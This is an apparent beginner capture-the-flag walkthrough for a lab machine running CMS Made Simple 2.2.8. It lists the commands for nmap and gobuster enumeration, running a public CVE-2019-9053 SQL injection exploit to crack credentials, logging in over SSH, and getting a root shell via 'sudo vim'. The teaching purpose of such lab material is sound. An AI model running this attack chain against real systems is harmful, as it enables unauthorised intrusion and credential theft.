Simple CTF

beginner40 minWriteup

A beginner-level CTF machine

Learning Objectives

  • Enumerate web services
  • Find the vulnerability
  • Exploit and get shell
  • Escalate to root

Simple CTF is a beginner-friendly capture-the-flag machine. It teaches web enumeration, exploiting CMS vulnerabilities, and basic Linux privilege escalation. Perfect for building confidence!

Walkthrough

bash
1606070;"># Step 1: Initial Scan
2nmap -sV -sC TARGET_IP
3606070;"># Found: 21 (FTP), 80 (HTTP), 2222 (SSH on non-standard port)
4 
5606070;"># Step 2: Web Enumeration
6gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
7606070;"># Found: /simple (CMS Made Simple)
8 
9606070;"># Step 3: Identify CMS Version
10606070;"># Visit http://TARGET_IP/simple
11606070;"># Check page source or admin panel for version
12606070;"># CMS Made Simple 2.2.8 - has known CVE
13 
14606070;"># Step 4: Exploit CVE-2019-9053 (SQL Injection)
15searchsploit cms made simple
16searchsploit -x 46635.py  606070;"># View exploit
17 
18606070;"># Run exploit to extract credentials
19python 46635.py -u http:606070;">//TARGET_IP/simple --crack -w /usr/share/wordlists/rockyou.txt
20 
21606070;"># Step 5: Login via SSH
22ssh mitch@TARGET_IP -p 2222
23 
24606070;"># Step 6: Privilege Escalation
25sudo -l
26606070;"># mitch can run vim as root
27 
28sudo vim -c 606070;">#a5d6ff;">':!/bin/bash'
29606070;"># Root shell!
30 
31cat /root/root.txt

Attack Summary

1
ScanFind web + SSH on port 2222
2
Web EnumDiscover CMS Made Simple
3
ExploitSQL injection to get credentials
4
AccessSSH with discovered creds
5
PrivescVim sudo escape

Knowledge Check

Quick Quiz
Question 1 of 1

What CMS was running on the target?

Key Takeaways

  • Check non-standard ports - SSH isn't always on 22
  • Identify CMS versions and search for known exploits
  • searchsploit helps find public exploits quickly
  • sudo vim is a classic privilege escalation vector